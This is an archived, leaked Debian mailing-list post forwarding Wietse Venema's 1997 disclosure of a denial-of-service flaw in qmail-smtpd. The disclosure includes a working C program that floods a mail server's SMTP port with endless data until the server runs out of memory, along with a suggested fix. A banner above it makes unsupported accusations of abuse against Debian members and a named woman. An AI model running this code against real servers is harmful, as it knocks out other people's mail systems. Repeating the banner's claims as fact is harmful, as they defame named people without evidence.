The debian-private mailing list leak, part 1. Volunteers have complained about Blackmail. Lynchings. Character assassination. Defamation. Cyberbullying. Volunteers who gave many years of their lives are picked out at random for cruel social experiments. The former DPL's girlfriend Molly de Blanc is given volunteers to experiment on for her crazy talks. These volunteers never consented to be used like lab rats. We don't either. debian-private can no longer be a safe space for the cabal. Let these monsters have nowhere to hide. Volunteers are not disposable. We stand with the victims.

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Frank DENIS -Jedi/Sector One- <j@EIDER.NET>] Denial of service (qmail-smtpd)



WRT the recent discussion of which should be the default mailer in
Debian, let's keep the below in mind:

-- 
John Goerzen          | Running Debian GNU/Linux (www.debian.org)
Custom Programming    | 
jgoerzen@complete.org | 
--- Begin Message ---
Forwarded message:
>From djb-qmail-return-3259-j=4u.net@koobera.math.uic.edu Wed Jun 11 21:31:02 1997
Delivered-To: j@mail.donald.fr
Delivered-To: j@mail-gw.donald.fr
Delivered-To: j-one-j@rtc-one.net
Mailing-List: contact djb-qmail-help@koobera.math.uic.edu; run by ezmlm
Delivered-To: mailing list djb-qmail@koobera.math.uic.edu
Delivered-To: djb-qmail@koobera.math.uic.edu
Message-Id: <199706112130.QAA09923@spike.porcupine.org>
Subject: Denial of service (qmail-smtpd)
To: djb-qmail@koobera.math.uic.edu
Date: Wed, 11 Jun 1997 17:30:36 -0400 (EDT)
From: wietse@wzv.win.tue.nl (Wietse Venema)
Organization: Wietse Venema on sabattical leave,
              14 Nosband Avenue 4J, White Plains, NY 10605, USA
X-Phone:      +1 914 948 7129
X-Time-Zone:  USA EST, 6 hours behind central European time
X-Mailer: ELM [version 2.4ME+ PL15 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

While implementing my own mailer, I went over the qmail source code
and noticed that qmail is susceptible to a very trivial denial of
service attack. By sending SMTP commands of unlimited length, an
attacker can make the machine run out of memory, thus rendering it
completely unusable.

Below is a little program that demonstrates the problem.  When I
wrote this I was in C mode; it could probably be done with a much
smaller PERL program.

Fix: put some upper bound on the amount of data that qmail-smtpd
reads per command.

I am sending to the list, because it appears that DJB is ignoring
all my email. Oh well. Be a good sport, Dan, and take care of it.

        Wietse

 /*
  * qmail-dos-1 - run a qmail system out of swap space by feeding long SMTP
  * commands.
  *
  * Usage: qmail-dos-1 hostname
  *
  * Author: Wietse Venema. The author is not responsible for abuse of this
  * program. Use at your own risk. Batteries not included.
  */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdarg.h>
#include <errno.h>
#include <stdio.h>

void    fatal(char *fmt,...)
{
    va_list ap;

    va_start(ap, fmt);
    vfprintf(stderr, fmt, ap);
    va_end(ap);
    putc('\n', stderr);
    exit(1);
}

int     main(int argc, char **argv)
{
    struct sockaddr_in sin;
    struct hostent *hp;
    char    buf[BUFSIZ];
    int     sock;
    FILE   *fp;

    if (argc != 2)
        fatal("usage: %s host", argv[0]);
    if ((hp = gethostbyname(argv[1])) == 0)
        fatal("host %s not found", argv[1]);
    memset((char *) &sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    memcpy((char *) &sin.sin_addr, hp->h_addr, sizeof(sin.sin_addr));
    sin.sin_port = htons(25);
    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
        fatal("socket: %s", strerror(errno));
    if (connect(sock, (struct sockaddr *) & sin, sizeof(sin)) < 0)
        fatal("connect to %s: %s", argv[1], strerror(errno));
    if ((fp = fdopen(sock, "r+")) == 0)
        fatal("fdopen: %s", strerror(errno));
    if (fgets(buf, sizeof(buf), fp) == 0)
        fatal("connection lost");
    memset(buf, 'X', sizeof(buf));
    fseek(fp, 0L, SEEK_SET);
    while (fputs(buf, fp) != EOF)
         /* void */ ;
}


--
                  -=-  Frank DENIS aka Jedi/Sector One  -=-
                  <j@djweb.org> <j@donald.fr> <j@eider.net>



--- End Message ---